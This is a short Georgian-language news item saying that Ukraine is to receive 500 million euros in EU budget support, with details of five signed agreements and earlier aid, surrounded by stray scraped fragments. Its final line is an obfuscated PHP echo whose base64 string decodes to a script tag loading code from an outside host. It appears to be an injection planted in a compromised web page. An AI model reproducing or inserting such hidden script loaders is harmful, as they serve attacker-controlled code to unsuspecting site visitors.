celsiusi
ავერსი შნაიდერი
სახელმწიფო ბიუჯეტის სტაბილიზაციის მხარდასაჭერად უკრაინა ევროკავშირისგან 500 მილიონ ევროს მიიღებს, - ინფორმაციას უკრაინის პრემიერმინისტრი, დენის შმიგალი ავრცელებს.
 
მისი თქმით, უკრაინამ და ევროკავშირმა ხელი მოაწერეს 5 შეთანხმებას, რომელიც აახლოებს ქვეყანას ევროკავშირში გაწევრიანებასთან და ხელს უწყობს სახელმწიფოს სტაბილურობას რუსი აგრესორის წინააღმდეგ ომში.
 
არსებული ინფორმაციით, ეს თანხები განათლების, სოფლის მეურნეობისა და სახლების რესტავრაციის საჭიროებებზეა გამოყოფილი.
 
შეგახსენებთ, რომ მიმდინარე წლის აგვისტოში ევროკავშირმა უკრაინას ომის ფინანსური შედეგების გადაჭრისთვის 1 მლრდ ევროს დახმარება გამოუყო. პაკეტის საერთო მოცულობა კი 9 მლრდ ევროს შეადგენს.
487
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");